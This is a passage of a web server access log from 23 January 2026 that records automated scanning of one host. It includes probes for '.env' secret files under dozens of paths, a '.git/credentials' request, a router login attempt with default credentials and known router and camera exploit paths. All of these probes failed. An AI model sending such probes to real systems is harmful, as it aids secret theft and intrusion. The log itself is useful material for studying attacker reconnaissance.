95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:21:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:37:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:45:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:17:54:16 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:03:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:10:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:11:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:18:05 +0000] 404 - GET http 91.82.83.208 "/dispatch.asp" [Client 195.3.222.218] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:18:53 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:33:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:18:34:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:37:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:41:36 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:18:41:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:48:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 98.90.194.164] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[23/Jan/2026:18:53:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:18:57:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.222.218] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" +[23/Jan/2026:18:58:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:22:56 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:19:26:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:28:15 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:39:34 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-I9082 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.7) Gecko/2009022800 SUSE/3.0.7-1.4 Firefox/3.0.7" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/demo/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.02 [de]" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/mail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Safari/522.0" "-" +[23/Jan/2026:19:39:35 +0000] 404 - GET http 91.82.83.208 "/m/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/remote/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; MZ601 Build/I.7.1-45) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/webmail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/vpn/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.3; en-gb; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/shop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:41.0) Gecko/20100101 Firefox/41.0" "-" +[23/Jan/2026:19:39:36 +0000] 404 - GET http 91.82.83.208 "/cloud/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0)" "-" +[23/Jan/2026:19:39:37 +0000] 404 - GET http 91.82.83.208 "/portal/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/host/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; nl-nl) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/support/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/pop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/store/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1)" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/cdn/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/dashboard/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0" "-" +[23/Jan/2026:19:39:38 +0000] 404 - GET http 91.82.83.208 "/test/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)" "-" +[23/Jan/2026:19:39:39 +0000] 404 - GET http 91.82.83.208 "/smtp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3204.0 Mobile Safari/537.36" "-" +[23/Jan/2026:19:39:39 +0000] 404 - GET http 91.82.83.208 "/ftp/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7" "-" +[23/Jan/2026:19:39:39 +0000] 404 - GET http 91.82.83.208 "/wiki/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.648)" "-" +[23/Jan/2026:19:39:39 +0000] 404 - GET http 91.82.83.208 "/help/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 635) like Gecko" "-" +[23/Jan/2026:19:39:39 +0000] 404 - GET http 91.82.83.208 "/blog/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.3.10 (KHTML, like Gecko) Version/8.0.3 Safari/600.3.10" "-" +[23/Jan/2026:19:41:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:45:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:48:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:19:49:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 35.189.199.133] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[23/Jan/2026:19:51:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:13:01 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:16:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:17:29 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:21:30 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:20:33:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:20:33:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:38:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:39:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:40:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:20:58:37 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:03:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.234.31.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[23/Jan/2026:21:03:13 +0000] 405 - POST http 91.82.83.208 "/" [Client 3.234.31.3] [Length 556] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[23/Jan/2026:21:03:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:09:37 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[23/Jan/2026:21:09:37 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[23/Jan/2026:21:26:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:28:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:28:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:36:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:41:38 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:21:50:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.130.34.74] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[23/Jan/2026:21:52:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:21:58:09 +0000] 404 - POST http 127.0.0.1 "/GponForm/diag_Form?images/" [Client 31.173.12.36] [Length 122] [Gzip 1.35] "Hello, World" "-" +[23/Jan/2026:21:58:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 31.173.12.36] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:22:18:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:19:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.234.31.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[23/Jan/2026:22:19:58 +0000] 405 - POST http 91.82.83.208 "/" [Client 3.234.31.3] [Length 556] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[23/Jan/2026:22:24:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:28:42 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:30:03 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 42.53.17.68] [Length 150] [Gzip -] "-" "-" +[23/Jan/2026:22:30:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:30:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[23/Jan/2026:22:30:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:31:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 141.98.11.171] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:22:45:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:22:51:15 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[23/Jan/2026:22:51:15 +0000] 400 - GET http 91.82.83.208 "/" [Client 162.142.125.197] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:22:51:22 +0000] 400 - - http localhost "-" [Client 162.142.125.197] [Length 154] [Gzip -] "-" "-" +[23/Jan/2026:22:51:34 +0000] 400 - GET http 91.82.83.208 "/sitemap.xml" [Client 162.142.125.197] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[23/Jan/2026:22:55:45 +0000] 404 - GET http 91.82.83.208 "/.git/credentials" [Client 195.178.110.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; Redmi Note 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36" "-" +[23/Jan/2026:23:07:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:13:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:14:55 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:23:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:24:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:26:08 +0000] 404 - GET http 91.82.83.208 "/dispatch.asp" [Client 195.3.222.218] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:32:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" 